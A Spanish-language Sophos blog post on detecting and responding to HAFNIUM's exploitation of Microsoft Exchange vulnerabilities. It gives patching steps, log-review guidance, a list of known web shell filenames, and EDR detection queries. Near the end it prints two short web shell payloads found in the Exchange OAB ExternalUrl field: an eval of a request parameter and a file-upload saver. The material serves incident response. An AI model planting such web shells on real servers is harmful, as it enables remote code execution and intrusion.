HAFNIUM: Consejos sobre el nuevo ataque de un Estado-nación

ActualidadCorporateHafnium

El 2 de marzo, se dieron a conocer públicamente las vulnerabilidades día cero que afectan a Microsoft Exchange. Estas vulnerabilidades están siendo explotadas activamente en el mundo real por HAFNIUM, un grupo que se cree que está patrocinado por una nación.

¿Qué es HAFNIUM?

Según una alerta de CISA:

Microsoft ha publicado actualizaciones de seguridad no programadas para abordar las vulnerabilidades que afectan a Microsoft Exchange Server 2013, 2016 y 2019. Un atacante remoto puede aprovechar tres vulnerabilidades de ejecución remota de código: CVE-2021-26857, CVE-2021-26858 y CVE-. 2021-27065 — para tomar el control de un sistema afectado y aprovechar una vulnerabilidad — CVE-2021-26855 — para obtener acceso a información confidencial. Estas vulnerabilidades se están explotando activamente en el mundo real.

CISA también emitió una directiva de emergencia instando a las organizaciones a parchear los servidores Exchange locales y buscar en sus redes indicadores de ataque.

Para obtener más detalles sobre HAFNIUM y consejos sobre cómo se debe actuar, te ofrecemos este video de Mat Gangwer, jefe del equipo de Sophos Managed Threat Response (MTR).

Para obtener detalles sobre las medidas de Sophos contra la explotación de estas vulnerabilidades, haz clic aquí.

También puedes asistir al webinar “HAFNIUM conozca los detalles de este reciente ataque” que tendrá lugar el viernes 12 de Marzo, a las 12:00 [CET], registrándote aquí.

¿Qué deberías hacer?

  1. Parchear o deshabilitar

Parchea todos los servidores Microsoft Exchange en las instalaciones de tu entorno con la actualización de seguridad correspondiente. Los detalles se pueden encontrar en el blog del equipo Exchange de Microsoft.

Si no puedes parchear, implementa una regla de reescritura de IIS y desactiva la mensajería unificada (UM), el VDir del panel de control de Exchange (ECP) y los servicios VDir de la libreta de direcciones sin conexión (OAB). Los detalles se pueden encontrar en el blog del Centro de respuesta de seguridad de Microsoft.

  1. Determina la posible exposición

Descarga y ejecuta el script Test-ProxyLogon.ps1 proporcionado por el equipo de Microsoft Exchange para determinar la posible exposición.

Es importante tener en cuenta que incluso con los parches instalados, esto no solucionará la presencia de shells web maliciosos. Es por esta razón que recomendamos el uso de la secuencia de comandos de Microsoft para identificar los servidores afectados y buscar la presencia de shells web.

Nuestras observaciones más comunes están relacionadas con CVE-2021-26855.

La ejecución de este script puede producir varios archivos .csv que se pueden ver en un editor de texto o en una hoja de cálculo.

Los hosts que pueden haber sido explotados por CVE-2021-26855 se enumerarán en el archivo [HOSTNAME] -Cve-2021-26855.csv

La columna “ClientIpAddress” enumerará las direcciones IP de origen de posibles atacantes.

La columna “AnchorMailbox” enumerará una ruta a varias aplicaciones que se ejecutan en Exchange que pueden haber sido atacadas. Para revelar qué acciones pudo haber tomado el atacante, deberás extraer la aplicación relevante de AnchorMailbox.

Por ejemplo, para “ServerInfo~a]@[CENSURADO]:444/autodiscover/autodiscover.xml?#”la aplicación relevante es /autodiscover/

Para determinar qué acciones tomó el adversario, deberás consultar los registros en %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\{application}

Por ejemplo,  %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\autodiscover\

La columna “DateTime” en [HOSTNAME] -Cve-2021-26855.csv proporcionará una marca de tiempo cuando tuvo lugar la explotación potencial, para usar al hacer referencia a los archivos de registro.

  1. Busca shells web u otros archivos .aspx sospechosos.

Se han observado shells web en los siguientes directorios:

  • C:\inetpub\wwwroot\aspnet_client\
  • C:\inetpub\wwwroot\aspnet_client\system_web\
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\

Los nombres comunes de estos shells web incluyen:

  • (8 números y letras aleatorios)
    • Regex: [0-9a-zA-Z]{8}.aspx
  • aspnet_client.aspx
  • aspnet_iisstart.aspx
  • aspnet_www.aspx
  • aspnettest.aspx
  • discover.aspx
  • document.aspx
  • error.aspx
  • errorcheck.aspx
  • errorEE.aspx
  • errorEEE.aspx
  • errorEW.aspx
  • errorFF.aspx
  • healthcheck.aspx
  • help.aspx
  • HttpProxy.aspx
  • Logout.aspx
  • MultiUp.aspx
  • one.aspx
  • OutlookEN.aspx
  • OutlookJP.aspx
  • OutlookRU.aspx
  • RedirSuiteServerProxy.aspx
  • shell.aspx
  • shellex.aspx
  • supp0rt.aspx
  • system_web.aspx
  • t.aspx
  • TimeoutLogout.aspx
  • web.aspx
  • web.aspx
  • xx.aspx
  1. Consulta Sophos EDR

Si estás utilizando Sophos EDR, puedes aprovechar las siguientes consultas para identificar posibles shells web a investigar.

/* Query for known web shell names */
SELECT
datetime(btime,'unixepoch') AS created_time,
filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
(path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');
/* Query for web shells with randomized 8 character names */
SELECT
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '[0-9a-zA-Z]{8}.aspx', 0) AS filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%');

Al revisar los shells web potenciales identificados por las consultas, el shell web normalmente aparecerá dentro de un archivo de configuración de la libreta de direcciones sin conexión (OAB) de Exchange, en el campo ExternalUrl. Por ejemplo:

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

  1. Establecer impacto

Revisa la actividad del proceso y las ejecuciones de comandos desde el momento en que se creó el shell web en adelante. Investiga la actividad de w3wp.exe (el proceso de trabajo del servidor web IIS) y cualquier instancia de csc.exe (compilador de C#) que se ejecute como un proceso secundario. Esto debería dar pistas para establecer el impacto.

Cómo puede ayudar Sophos Managed Threat Response (MTR)

Las amenazas como HAFNIUM son un gran ejemplo de la tranquilidad que se tiene al saber que tu organización está respaldada por un equipo de élite de cazadores de amenazas y expertos en ciberamenazas.

Cuando se supo la noticia de HAFNIUM, el equipo de Sophos MTR inmediatamente comenzó a buscar e investigar en los entornos de los clientes para determinar si había alguna actividad relacionada con el ataque. Además, también buscaron nuevas pistas o IoC relacionados con el ataque que pudieran brindar mayor protección a todos los clientes de Sophos.

La naturaleza 24/7 de Sophos MTR significa que no se desperdicia ni un segundo antes de que el equipo se pusiera a trabajar, lo que garantiza la protección de nuestros clientes.

SophosLabs también ha publicado detecciones relacionadas con la actividad conocida y los IOC relacionados con la vulnerabilidad de Exchange. Esto se suma a las protecciones anteriores ya implementadas para detectar la actividad posterior a la explotación.

¿Preocupado por HAFNIUM? Ponte en contacto con Sophos MTR hoy mismo para asegurar que se identifique y neutralice cualquier posible actividad maliciosa en tu entorno.

Recuerda que también puedes asistir al webinar “HAFNIUM conozca los detalles de este reciente ataque” que tendrá lugar el viernes 12 de Marzo, a las 12:00 [CET], registrándote aquí.

Leave a Reply

Your email address will not be published.